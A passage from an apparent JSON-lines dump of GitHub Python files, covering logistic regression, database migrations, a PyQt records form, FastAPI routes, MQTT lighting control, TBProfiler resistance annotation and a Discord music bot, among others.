LogisticRegression(max_iter=1000, class_weight='balanced')\r\n\r\n car_y_train = replaceClassName(1, y_train).astype('int')\r\n fad_y_train = replaceClassName(2, y_train).astype('int')\r\n mas_y_train = replaceClassName(3, y_train).astype('int')\r\n gla_y_train = replaceClassName(4, y_train).astype('int')\r\n con_y_train = replaceClassName(5, y_train).astype('int')\r\n adi_y_train = replaceClassName(6, y_train).astype('int')\r\n\r\n logistic_regression_for_car.fit(x_train, car_y_train)\r\n logistic_regression_for_fad.fit(x_train, fad_y_train)\r\n logistic_regression_for_mas.fit(x_train, mas_y_train)\r\n logistic_regression_for_gla.fit(x_train, gla_y_train)\r\n logistic_regression_for_con.fit(x_train, con_y_train)\r\n logistic_regression_for_adi.fit(x_train, adi_y_train)\r\n\r\n return [logistic_regression_for_car, logistic_regression_for_fad, logistic_regression_for_mas,\r\n logistic_regression_for_gla, logistic_regression_for_con, logistic_regression_for_adi]\r\n\r\n\r\n# Isolate specific class by define it as '1' and others to '0'\r\ndef replaceClassName(oneOption, Ys_train):\r\n copy = Ys_train.copy()\r\n copy[copy != oneOption] = 0\r\n copy[copy == oneOption] = 1\r\n return copy\r\n\r\n\r\n# Convert all Y vector's values to numbers\r\ndef setupY(y):\r\n y[y == 'car'] = 1\r\n y[y == 'fad'] = 2\r\n y[y == 'mas'] = 3\r\n y[y == 'gla'] = 4\r\n y[y == 'con'] = 5\r\n y[y == 'adi'] = 6\r\n return y\r\n\r\n\r\n# Filter 2 classes from array of classes\r\ndef filterClasses(x_train, y_train, class1, class2):\r\n class1Indexes = np.asarray(np.where(y_train == class1))\r\n class2Indexes = np.asarray(np.where(y_train == class2))\r\n mergeIndexes = np.sort(np.concatenate((class1Indexes[0], class2Indexes[0])))\r\n return [x_train[mergeIndexes, :], replaceClassName(class1, y_train[mergeIndexes])]\r\n\r\n\r\n# Setup the infrastructures for the One vs One LR method\r\ndef setupLRsOneVsOne(x_train, y_train, numOfClasses):\r\n oneVSoneLRsArray = np.zeros((numOfClasses, numOfClasses), dtype=object)\r\n for j in range(numOfClasses):\r\n for i in range(j + 1, numOfClasses):\r\n x_train_ij, y_train_ij = filterClasses(deepcopy(x_train), y_train.copy(), j + 1, i + 1)\r\n oneVSoneLRsArray[j][i] = LogisticRegression(max_iter=1000, class_weight='balanced').fit(x_train_ij,\r\n list(y_train_ij))\r\n return oneVSoneLRsArray\r\n\r\n\r\n# Execute the One vs One LRs algorithm\r\ndef calculate_oneVSoneLR(oneVSoneLRsArray, numOfClasses, x_test, y_test):\r\n oneVSone_confusion_matrix = np.zeros((numOfClasses, numOfClasses))\r\n LR_results = np.zeros(numOfClasses)\r\n for k in range(len(y_test)):\r\n for j in range(numOfClasses):\r\n for i in range(numOfClasses):\r\n if i > j:\r\n LR_results[j] += (oneVSoneLRsArray[j][i].predict_proba([x_test[k]]))[0][1]\r\n elif i < j:\r\n LR_results[j] += (oneVSoneLRsArray[i][j].predict_proba([x_test[k]]))[0][0]\r\n oneVSone_confusion_matrix[y_test[k] - 1][np.argmax(LR_results)] += 1\r\n LR_results = np.zeros(numOfClasses)\r\n\r\n sn.heatmap(oneVSone_confusion_matrix, annot=True, xticklabels=('car', 'fad', 'mas', 'gla', 'con', 'adi'),\r\n yticklabels=('car', 'fad', 'mas', 'gla', 'con', 'adi'))\r\n accuracy = 0\r\n for i in range(6):\r\n accuracy += oneVSone_confusion_matrix[i][i]\r\n accuracy = accuracy / len(x_test)\r\n print('One vs One Accuracy: ', accuracy)\r\n plt.xlabel('Predict')\r\n plt.ylabel('Actual')\r\n plt.title('One vs One')\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n excelData = pd.read_excel('breastTissue for one and all.xlsx', sheet_name='Data')\r\n df = pd.DataFrame(excelData,\r\n columns=['Case #', 'Class', 'I0', 'PA500', 'HFS', 'DA', 'Area', 'A/DA', 'Max IP', 'DR', 'P'])\r\n x = df[['I0', 'PA500', 'HFS', 'DA', 'Area', 'A/DA', 'Max IP', 'DR', 'P']]\r\n y = df['Class']\r\n y = y.to_numpy()\r\n numericY = setupY(y.copy())\r\n x = preprocessing.scale(x)\r\n x_train, x_test, y_train, y_test = train_test_split(x, numericY, test_size=0.33, random_state=42)\r\n LR_Models = setupLRsOneVsAll(x_train, y_train)\r\n build_oneVSall_matrix(LR_Models, x_test, y_test)\r\n\r\n oneVSoneLRsArray = setupLRsOneVsOne(x_train, y_train, 6)\r\n calculate_oneVSoneLR(oneVSoneLRsArray, 6, x_test, y_test)\r\n","repo_name":"adielts/My-repo","sub_path":"Deep learning/LR_oneVSone_oneVSall.py","file_name":"LR_oneVSone_oneVSall.py","file_ext":"py","file_size_in_byte":6293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10835322790","text":"\"\"\"empty message\n\nRevision ID: 0bc364df16ea\nRevises: 4b8e4473789a\nCreate Date: 2022-04-24 19:24:31.929077\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0bc364df16ea'\ndown_revision = '4b8e4473789a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('instructor', 'section_id')\n op.add_column('section', sa.Column('assignedInstructor', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'section', 'instructor', ['assignedInstructor'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'section', type_='foreignkey')\n op.drop_column('section', 'assignedInstructor')\n op.add_column('instructor', sa.Column('section_id', sa.INTEGER(), nullable=True))\n # ### end Alembic commands ###\n","repo_name":"MitchelCarreon/cpscadtaa","sub_path":"migrations/versions/0bc364df16ea_.py","file_name":"0bc364df16ea_.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"33501192849","text":"class Solution:\n def getRow(self, rowIndex: int) -> List[int]:\n if rowIndex == 0:\n return [1]\n elif rowIndex == 1:\n return [1, 1]\n else:\n prevRow = self.getRow(rowIndex - 1)\n temp = []\n for i in range(len(prevRow) - 1):\n temp.append(prevRow[i] + prevRow[i+1])\n return [1] + temp + [1]\n\n\n \n\n\n ","repo_name":"dagiTensay/competitve-programming","sub_path":"0119-pascals-triangle-ii/0119-pascals-triangle-ii.py","file_name":"0119-pascals-triangle-ii.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23217462726","text":"import sqlite3\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QTableWidgetItem, QMessageBox\nfrom menu import Ui_Menu\nfrom sqlite3 import Error\nfrom table import Ui_Dialog\nimport sys\nfrom AddRecord_UI import Ui_Dialog\nimport datetime\nfrom Alert import Alert\nimport PyQt5\n\nif hasattr(QtCore.Qt, 'AA_EnableHighDpiScaling'):\n PyQt5.QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling, True)\n \nif hasattr(QtCore.Qt, 'AA_UseHighDpiPixmaps'):\n PyQt5.QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps, True)\n\nclass AddRecords:\n def __init__(self,rights,data):\n self.conn = sqlite3.connect('se_db.db')\n self.rights = rights\n self.data = data\n \n self.rr = []\n self.diag = QtWidgets.QDialog()\n self.ui = Ui_Dialog()\n self.ui.setupUi(self.diag)\n self.ui.pushButton.clicked.connect(self.AddRecord)\n self.ui.comboBox.addItems([\"1\", \"2\", \"3\"])\n self.ui.comboBox_2.addItems([\"1\", \"2\", \"3\",\"4\",\"5\",\"6\",\"7\",\"8\"])\n self.ui.comboBox_3.addItems([\"Fit\",\"Unfit\",\"Critical\"])\n self.ui.comboBox_4.addItems([\"Murder\",\"Roberry\",\"Extortion\",\"Blasphemy\",\"Corruption\",\"Theft\",\"Cyber Crimes\",\"Human Trafficking\",\"Attempt to Commit Suicide\"])\n self.ui.comboBox_5.addItems([\"None\",\"Laundry\",\"Cleaning\",\"Kitchen\"])\n\n if self.rights == 1:\n self.editRecord()\n\n self.diag.exec_()\n \n def AddRecord(self):\n \n\n if self.ui.textEdit.toPlainText().isalpha():\n name = self.ui.textEdit.toPlainText()\n print(\"name = letters only\")\n else:\n self.ui.textEdit.setFocus()\n name = \"wrongvalue\"\n section_ID = self.ui.comboBox.currentText()\n cell_ID = self.ui.comboBox_2.currentText() #Filhal Hardcoded\n try:\n sentence = int(self.ui.textEdit_3.toPlainText())\n except ValueError:\n self.ui.textEdit_3.setFocus()\n sentence = \"wrongvalue\"\n print(\"Characters included\")\n \n if self.rights == 1: #edit mode\n mydata = self.data[0]\n arrival_Date = mydata[4] #use old arrival date\n\n #yahan release date change krni hai according to sentence (which has been modified)\n release_Date = mydata[5] #remomve this \n\n else: #new recird hai\n\n x = datetime.datetime.now()\n arrival_Date = str(x.day)+\"-\"+str(x.month)+\"-\"+str(x.year)\n \n if sentence != \"wrongvalue\": #warna string ko int mein add kr rha tha\n release_Date = str(x.day)+\"-\"+str(x.month)+\"-\"+str(x.year+sentence)\n \n Crime = self.ui.comboBox_4.currentText()\n crime_description = self.ui.textEdit_5.toPlainText()\n Medical_Status = self.ui.comboBox_3.currentText()\n if self.ui.textEdit_6.toPlainText().isalpha():\n Emergency_contact_name = self.ui.textEdit_6.toPlainText()\n print(\"name = letters only\")\n else:\n self.ui.textEdit_6.setFocus()\n Emergency_contact_name = \"wrongvalue\"\n duty_assigned = self.ui.comboBox_5.currentText()\n\n try:\n age = int(self.ui.textEdit_4.toPlainText())\n except ValueError:\n self.ui.textEdit_4.setFocus()\n age = \"wrongvalue\"\n print(\"Characters included\")\n try:\n Emergency_contact_number = int(self.ui.textEdit_7.toPlainText())\n except ValueError:\n self.ui.textEdit_7.setFocus()\n Emergency_contact_number = \"wrongvalue\"\n print(\"Characters included\")\n\n if name != \"wrongvalue\" and age != \"wrongvalue\" and sentence != \"wrongvalue\" and Emergency_contact_name != \"wrongvalue\" and Emergency_contact_number != \"wrongvalue\":\n newrr = []\n #rr.append(5)\n self.rr.append(name)\n self.rr.append(section_ID)\n self.rr.append(cell_ID)\n self.rr.append(arrival_Date)\n self.rr.append(release_Date)\n self.rr.append(Crime)\n self.rr.append(crime_description)\n self.rr.append(sentence)\n self.rr.append(Medical_Status)\n self.rr.append(Emergency_contact_name)\n self.rr.append(duty_assigned)\n \n self.rr.append(age)\n \n self.rr.append(Emergency_contact_number)\n \n cur = self.conn.cursor()\n \n if(self.rights==0):\n \n cur.execute(\"Insert into Prisoner(prisoner_name,section_id,cell_id,arrival_date,release_date,crime,crime_description,sentence,medical_status,emergency_name,work_assigned,Emergency_contact,Age) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)\",self.rr)\n \n \n \n else:\n #EditRecord\n \n \n iterator = 0\n \n #newrr.append(self.rr[0]) #ID at end\n \n for i in self.rr:\n if(iterator==0):\n None\n else:\n newrr.append(i)\n iterator = iterator + 1\n \n newrr.append(self.rr[0]) #ID at end\n \n cur.execute(\"Update Prisoner SET prisoner_name=?, section_id=?,cell_id=?,arrival_date=?,release_date=?,crime=?,crime_description=?,sentence=?,medical_status=?,emergency_name=?,work_assigned=?,Emergency_contact=?,Age=? WHERE prisoner_id=?\",newrr)\n self.conn.commit()\n self.rr.clear()\n newrr.clear()\n \n self.ui.textEdit.clear()\n self.ui.textEdit_3.clear()\n self.ui.textEdit_4.clear()\n self.ui.textEdit_5.clear()\n self.ui.textEdit_6.clear()\n self.ui.textEdit_7.clear()\n\n else:\n \"\"\" show alert box here \"\"\"\n msg = Alert(\"Invalid input(s)\")\n\n\n \n\n\n def editRecord(self):\n \n print(\"hi\")\n '''\n name -> textEdit\n age -> textEdit_4\n crime description -> textEdit5\n sentence -> textEdit3\n Emergency contact Name-> textEdit6\n Emergency contact Number-> textEdit7\n\n\n for record in data:\n itr = 0\n for eachrecord in data:\n if(itr==0 or itr==2 or itr==3 or itr==5 or itr==6 or itr==1):\n print(\"I am here\")\n else:\n self.ui.textEdit_4.setText(\"Amir\")\n\n\n \n '''\n\n # int index = ui->comboBox->findText(textToFind)\n # ui->comboBox->setCurrentIndex(index);\n\n mydata = self.data[0]\n print(\"Data Received\",self.data)\n ID = mydata[0]\n Name = mydata[1]\n section = mydata[2]\n cell = mydata[3]\n A_date = mydata[4]\n R_date = mydata[5]\n crime = mydata[6]\n crime_desp = mydata[7]\n sentence = mydata[8]\n\n medical = mydata[9]\n emg_Name = mydata[10]\n emg_Contact = mydata[12]\n work_Assigned = mydata[11]\n Age = mydata[13]\n\n self.rr.append(ID)\n\n\n\n\n\n\n print(self.data)\n self.ui.textEdit_4.setText(str(Age))\n self.ui.textEdit.setText(str(Name))\n self.ui.textEdit_5.setText(str(crime_desp))\n self.ui.textEdit_3.setText(str(sentence))\n self.ui.textEdit_6.setText(str(emg_Name))\n self.ui.textEdit_7.setText(str(emg_Contact))\n\n index = 0\n\n index = self.ui.comboBox.findText(str(section))\n self.ui.comboBox.setCurrentIndex(index)\n \n index = self.ui.comboBox_2.findText(str(cell))\n self.ui.comboBox_2.setCurrentIndex(index)\n\n index = self.ui.comboBox_3.findText(str(medical))\n self.ui.comboBox_3.setCurrentIndex(index)\n\n index = self.ui.comboBox_4.findText(str(crime))\n self.ui.comboBox_4.setCurrentIndex(index)\n\n index = self.ui.comboBox_5.findText(str(work_Assigned))\n self.ui.comboBox_5.setCurrentIndex(index)\n\n\n \n\n \n\n\n ","repo_name":"AmirQadir/PrisonManagementSystem","sub_path":"AddRecords.py","file_name":"AddRecords.py","file_ext":"py","file_size_in_byte":8034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33704648401","text":"import json\r\n\r\nclass channel:\r\n\r\n number = ''\r\n name =''\r\n picture = ''\r\n\r\nclass channels(object):\r\n\r\n def __init__(self, data):\r\n self.jData = data\r\n\r\n def getChannel(self, channelNo):\r\n\r\n ch = channel\r\n ch.name = 'Channel %s' % str(channelNo)\r\n\r\n for item in self.jData['channellist']:\r\n if item['contentId'] == str(channelNo):\r\n ch.name = item['name']\r\n ch.number = item ['chanNo']\r\n\r\n # just take first picture\r\n pics = item ['pictures']\r\n for p in pics:\r\n ch.picture = p['href']\r\n break\r\n\r\n return ch\r\n\r\n\r\n\r\n","repo_name":"mking2203/plugin.video.myMagenta","sub_path":"resources/lib/channels.py","file_name":"channels.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11861576711","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@author: krakowiakpawel9@gmail.com\n@site: e-smartdata.org\n\"\"\"\n\nimport pandas as pd\n\n\n# %% import data form csv file, comma separated file\ndf = pd.read_csv('./data/cdr_d.csv', index_col=0)\n\n# select only close price\nclose_price = df['Zamkniecie']\n\n# export oto csv\nclose_price.to_csv('./data/close_price.csv', header=['close'])\n\n# export to json\nclose_price.to_json('./data/close_price.json')\n\n# export to latex\nclose_price.to_latex('./data/close_price.tex')\n\n# export to python list\nclose_price_dict = close_price.to_dict()\n\n# %% import data from clipboard\nclipboard_df = pd.read_clipboard()\n\n# export to csv file\nclipboard_df.to_csv('./data/clipboard.csv', encoding='utf-8')\n\n# export to json file\nclipboard_df.to_json('./data/clipboard.json')\n","repo_name":"krakowiakpawel9/pandas_course","sub_path":"01_data_structure/01_series/05_import_export_data.py","file_name":"05_import_export_data.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"5613295824","text":"from fastapi import APIRouter\nfrom core.schemas import product\n\nProduct = product.Product\nrouter = APIRouter()\n\ndata = [\n {\n \"name\": \"Samsung 103in Curved TV\",\n \"description\": \"Its supa curvy and thiccc\",\n \"price\": 999.99,\n \"id\": \"2342342332\"\n },\n {\n \"name\": \"Samsung 99in TV\",\n \"description\": \"Its supa thiccc\",\n \"price\": 700,\n \"id\": \"12312\"\n },\n {\n \"name\": \"Sony 27in Monitor\",\n \"description\": \"Really good crispy monitor\",\n \"price\": 100.22,\n \"id\": \"123sdf\"\n }\n]\n\n@router.get(\"/\")\nasync def get_all_products(size: int = 0):\n if size == 0:\n return data\n else:\n return data[:size]\n\n\n\n@router.get(\"/{product_id}\")\nasync def get_all_products(product_id: str):\n for x in data:\n print(x['id'])\n if x['id'] == str(product_id):\n return x\n return str(\"The product you were looking for with id \"+ product_id + \" was not in our system\")\n\n\n@router.post(\"/create\")\nasync def create_some_product(my_product: Product):\n data.append(my_product)\n return data\n","repo_name":"ashishkjay/cms-manager-api","sub_path":"v1/routes/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8622943139","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n# @Time : 2020/10/8 11:22\n# @Author : NJU\n# @Version:V 0.1\n# @File : Discussions.py\n# @desc :\n\nfrom source.data.bean.Beanbase import BeanBase\nfrom source.data.bean.Notes import Notes\nfrom source.utils.StringKeyUtils import StringKeyUtils\n\n\nclass Discussions(BeanBase):\n \"\"\"记录 Gitlab 的 discussions 对象\n \"\"\"\n\n def __init__(self):\n self.id = None\n self.notes = None # List\n\n self.change_trigger_system = None # 用于标识系统判定的更改\n self.analysisNodesList = None # 分析时候用的 notes 的暂时存储\n\n @staticmethod\n def getIdentifyKeys():\n \"\"\"提供对象所有要放数据库的主键\"\"\"\n return [StringKeyUtils.STR_KEY_ID]\n\n @staticmethod\n def getItemKeyList():\n \"\"\"提供对象所有要放数据库的数据项\"\"\"\n return [StringKeyUtils.STR_KEY_ID]\n\n @staticmethod\n def getItemKeyListWithType():\n items = [(StringKeyUtils.STR_KEY_ID, BeanBase.DATA_TYPE_STRING)]\n return items\n\n def getValueDict(self):\n items = {StringKeyUtils.STR_KEY_ID: self.id}\n return items\n\n class parser(BeanBase.parser):\n\n @staticmethod\n def parser(src):\n res = Discussions()\n if isinstance(src, dict):\n res.id = src.get(StringKeyUtils.STR_KEY_ID, None)\n notes = src.get(StringKeyUtils.STR_KEY_NOTES, None)\n if notes is not None and isinstance(notes, list):\n note_list = []\n for note in notes:\n if note is not None:\n note_list.append(Notes.parser.parser(note))\n res.notes = note_list\n\n return res\n\n class parserV4(BeanBase.parser):\n\n @staticmethod\n def parser(src):\n res = Discussions()\n if isinstance(src, dict):\n res.id = src.get(StringKeyUtils.STR_KEY_ID, None)\n notes = src.get(StringKeyUtils.STR_KEY_NOTES, None)\n if notes is not None and isinstance(notes, dict):\n notesData = notes.get(StringKeyUtils.STR_KEY_NODES, None)\n if isinstance(notesData, list):\n note_list = []\n for note in notesData:\n if note is not None:\n note_list.append(Notes.parserV4.parser(note))\n res.notes = note_list\n\n return res\n","repo_name":"soilerl/HuaweiProject","sub_path":"source/data/bean/Discussions.py","file_name":"Discussions.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39263638220","text":"import pathogenprofiler as pp\nimport requests\nimport re\n\n\ndef aa_long2short(mut):\n aconv = {\n \"Ala\":\"A\",\"Arg\":\"R\",\"Asn\":\"N\",\"Asp\":\"D\",\"Cys\":\"C\",\n \"Gln\":\"Q\",\"Glu\":\"E\",\"Gly\":\"G\",\"His\":\"H\",\"Ile\":\"I\",\n \"Leu\":\"L\",\"Lys\":\"K\",\"Met\":\"M\",\"Phe\":\"F\",\"Pro\":\"P\",\n \"Ser\":\"S\",\"Thr\":\"T\",\"Trp\":\"W\",\"Tyr\":\"Y\",\"Val\":\"V\",\n \"Stop\":\"*\", \"-\":\"-\",\"*\":\"*\"\n }\n r = re.search(\"p.([A-Z][a-z][a-z])([0-9]+)([A-Za-z\\*]+)\",mut)\n return f\"{aconv[r.group(1)]}{r.group(2)}{aconv[r.group(3)]}\"\n\ndef get_biosig_pza_prediction(raw_change):\n change = aa_long2short(raw_change)\n g = requests.get(f\"http://biosig.unimelb.edu.au/suspect_pza/api/prediction_single?mutation={change}\")\n data = g.json()\n data[\"prediction\"] = data[\"suspect_pza_prediction\"]\n return data\n\ndef get_biosig_bdq_prediction(raw_change):\n change = aa_long2short(raw_change)\n g = requests.get(f\"http://biosig.unimelb.edu.au/suspect_bdq/api/prediction_single?mutation={change}\")\n data = g.json()\n data[\"prediction\"] = data[\"suspect_bdq_prediction\"]\n return data\n\ndef suspect_profiling(results):\n new_vars = []\n for var in results[\"other_variants\"]:\n if var[\"type\"]!=\"missense_variant\": continue\n pred = None\n if var[\"gene\"]==\"atpE\":\n pp.logging.info(f\"Profiling {var['gene']} {var['change']} with suspect-bdq\")\n pred = get_biosig_bdq_prediction(var[\"change\"])\n if var[\"gene\"]==\"pncA\":\n pp.logging.info(f\"Profiling {var['gene']} {var['change']} with suspect-pza\")\n pred = get_biosig_pza_prediction(var[\"change\"])\n if pred:\n if \"annotation\" in var:\n var[\"annotation\"].append(pred)\n else:\n var[\"annotation\"] = [pred]\n if pred[\"prediction\"]==\"Resistant\":\n var[\"drugs\"] = [{\n \"type\":\"drug\",\n \"drug\":\"pyrazinamide\" if var[\"gene\"]==\"pncA\" else \"bedaquiline\",\n \"confers\": \"resistance\",\n \"evidence\": \"suspect-PZA\" if var[\"gene\"]==\"pncA\" else \"suspect-BDQ\"\n }]\n new_vars.append(var)\n for v in new_vars:\n results[\"dr_variants\"].append(v)\n results[\"other_variants\"].remove(v)\n return results","repo_name":"jodyphelan/TBProfiler","sub_path":"tbprofiler/xdb.py","file_name":"xdb.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"16"} +{"seq_id":"26614219882","text":"import paho.mqtt.publish as publish\nimport paho.mqtt.client as mqtt\nimport time\nfrom server_helpers import *\nfrom lighting_helpers import *\nMQTT_SERVER = \"192.168.43.130\"\n#port = 1883\nsend_path = \"topic/serene\"\nlisten_path = \"topic/init_loc\"\nrec_client_strings = {}\nMIN_CLIENTS = 1\ncycle = 0\n\ndef on_publish(client,userdata,result):\n\tprint(\"LED sequence sent\")\n\tpass\n\ndef on_connect(client, userdata, flags, rc):\n\tprint(\"Connected: result code \" + str(rc))\n\tclient.subscribe(listen_path)\n\ndef on_message(client, userdata, msg):\n byte_statement = msg.payload\n statement = byte_statement.decode(\"utf-8\")\n print(msg.topic + \" \" + str(statement))\n if \"DIED\" in statement:\n dead_client = statement[:-4]\n if dead_client in rec_client_strings:\n del rec_client_strings[dead_client]\n else:\n split_string = statement.split(\";\")\n # Map statement to client ID. This overwrites any previous statements from same client.\n rec_client_strings[split_string[4]]=statement\n \n time.sleep(2)\n\ndef assign_lighting(grid, cycle, num_clients):\n msg = \"\"\n if num_clients == 1:\n msg = steady_on(grid, cycle)\n #print(\"steady_on\")\n elif (num_clients == 2):\n msg = flash_slow(grid, cycle)\n #print(\"flash_slow\")\n elif num_clients == 3:\n #msg = flash_fast(grid, cycle)\n #print(\"flash_fast\")\n print('three connected')\n msg = three_connected_colors(grid,cycle, \"b\", \"d\")\n # msg = three_connected_basic(grid,cycle)\n elif num_clients == 4:\n msg = UCLA_light_scheme(grid, cycle)\n #print(\"UCLA_light_scheme\")\n return msg\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_publish = on_publish\nclient.connect(MQTT_SERVER, 1883, 60)\n#client.loop_forever()\nclient.loop_start()\nwhile True:\n time.sleep(2)\n if len(rec_client_strings) >= MIN_CLIENTS:\n client_data = parse_from_strings_hash(rec_client_strings)\n print(client_data)\n grid, _ = localize_all(client_data)\n light_asgns = assign_lighting(grid, cycle, len(client_data))\n print(\"THIS IS THE LIGHT ASSIGNMENT\")\n print(light_asgns)\n client.publish(send_path, light_asgns)\n cycle += 1\n","repo_name":"auszhang/ECE180D-Project","sub_path":"Fall/MQTT_Code/server_hash.py","file_name":"server_hash.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"36636920376","text":"from PIL import Image\n\nn_imagem = input(\"Digite o numero da imagem: \")\nim = \"../BancoImagem/imagem\" + n_imagem + \".png\"\nimagem = Image.open(im)\ntamanho = imagem.size\n\ntudo = []\nfor x in range(tamanho[0]):\n for y in range(tamanho[1]):\n pixel = imagem.getpixel((x,y))\n \n if pixel != (255,255,255,255):\n tudo.append((x,y))\n\n#Procura por pixels em uma area 3X3 tendo o pixel informado como centro\ndef achar_pixel(referencia,direcao,lista,imagem):\n area = []\n for x in range(referencia[0]-1,referencia[0]+2):\n for y in range(referencia[1]-1,referencia[1]+2):\n pixel = imagem.getpixel((x,y))\n\n if pixel != (255,255,255,255):\n if (x,y) not in lista:\n area.append((x,y))\n if len(area) != 0:\n for ponto in area:\n if ponto[0] - referencia[0] == direcao[0] and ponto[1] - referencia[1] == direcao[1]:\n return (ponto,direcao)\n\n return (area[0], (area[0][0]-referencia[0],area[0][1]-referencia[1]))\n\n return None\n\n#Acha o primeiro pixel com a cor informada\ndef achar_inicio(imagem,tamanho,cor=(0,0,0,255)):\n for x in range(tamanho[0]):\n for y in range(tamanho[1]):\n pixel = imagem.getpixel((x,y))\n \n if pixel == cor:\n return (x,y)\n \n\ninicio = achar_inicio(imagem,tamanho,(255,0,0,255))\nreferencia = inicio\ndirecao = (0,0)\nlista = [inicio]\nexe = True\n\nwhile exe:\n\n resultado = achar_pixel(referencia,direcao,lista,imagem)\n if resultado is None:\n exe = False\n try:\n referencia = resultado[0]\n direcao = resultado[1]\n lista.append(referencia)\n except:\n exe = False\n\nprint(len(lista))\nprint(len(tudo))\n\ncont = 1\nfor x in tudo:\n if x not in lista:\n print(str(cont) + \" \" + str(x))\n cont += 1\n\n\nprogress = input(\"Digite 0 para parar. Para prosseguir, pressione qualquer tecla. --> \")\nif progress == \"0\":\n exit(0)\n\n\n\n# Pegar pontos faltantes e adicionar na lista de coordenadas\narea = []\nfor referencia in lista:\n for x in range(referencia[0]-1,referencia[0]+2):\n for y in range(referencia[1]-1,referencia[1]+2):\n pixel = imagem.getpixel((x,y))\n\n if pixel != (255,255,255,255):\n if (x,y) not in lista and (x,y) not in area:\n area.append((x,y))\n index = lista.index(referencia)\n lista.insert(index+1,(x,y))\n\nprint()\nprint(len(lista))\nprint(len(tudo), end=\"\\n\")\nfor i in area:\n print(i, end=\" / \")\nprint()\n\n# Checar se os pontos foram adicionandos no local correto\n\nfor i in lista:\n print(i)\n\n#Calcular diferença entre ponto_x e ponto_x+1 --- passar para o interpretador --- passar para o drone\ndiferenca = []\nfor x in range(len(lista)):\n if x+1 == len(lista):\n break\n else:\n ele1 = lista[x]\n ele2 = lista[x+1]\n dif = (ele1[0]-ele2[0],ele1[1]-ele2[1])\n diferenca.append(dif)\n\nprint(diferenca)","repo_name":"Lima001/Tecnico-IFC","sub_path":"PI-III/Testes/Teste 02/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39263331560","text":"\nimport discord\nfrom discord.ext import commands\nimport youtube_dl\n\nclass music(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n @commands.command()\n async def join(self, ctx):\n if ctx.author.voice is None:\n await ctx.send('Подключись к каналу')\n voice_channel = ctx.author.voice.channel\n if ctx.voice_client is None:\n await voice_channel.connect()\n else:\n await ctx.voice_client.move_to(voice_channel)\n\n @commands.command()\n async def disconnect(self, ctx):\n await ctx.voice_client.disconnect()\n\n @commands.command()\n async def play(self, ctx, url):\n destination = ctx.author.voice.channel\n await destination.connect()\n FFMPEG_OPTIONS = {'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'}\n voice = ctx.voice_client\n YDL_OPTIONS = {'format': \"bestaudio\"}\n\n\n with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:\n info = ydl.extract_info(url, download=False)\n url2 = info['formats'][0]['url']\n voice.play(discord.FFmpegPCMAudio(executable = 'ffmpeg.exe', source=url2, **FFMPEG_OPTIONS))\n\n\ndef setup(client):\n client.add_cog(music(client))","repo_name":"KatoonGeka/musicDiscordBot","sub_path":"music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5567815802","text":"import torch\nimport torch.nn as nn\nfrom torch.nn.modules.activation import ReLU\n\n\nstr_to_initializer = {\n 'uniform': nn.init.uniform_,\n 'normal': nn.init.normal_,\n 'eye': nn.init.eye_,\n 'xavier_uniform': nn.init.xavier_uniform_,\n 'xavier': nn.init.xavier_uniform_,\n 'xavier_normal': nn.init.xavier_normal_,\n 'kaiming_uniform': nn.init.kaiming_uniform_,\n 'kaiming': nn.init.kaiming_uniform_,\n 'kaiming_normal': nn.init.kaiming_normal_,\n 'he': nn.init.kaiming_normal_,\n 'orthogonal': nn.init.orthogonal_\n }\n\n\nstr_to_activation = {\n 'elu': nn.ELU(),\n 'hardshrink': nn.Hardshrink(),\n 'hardtanh': nn.Hardtanh(),\n 'leakyrelu': nn.LeakyReLU(),\n 'logsigmoid': nn.LogSigmoid(),\n 'prelu': nn.PReLU(),\n 'relu': nn.ReLU(),\n 'relu6': nn.ReLU6(),\n 'rrelu': 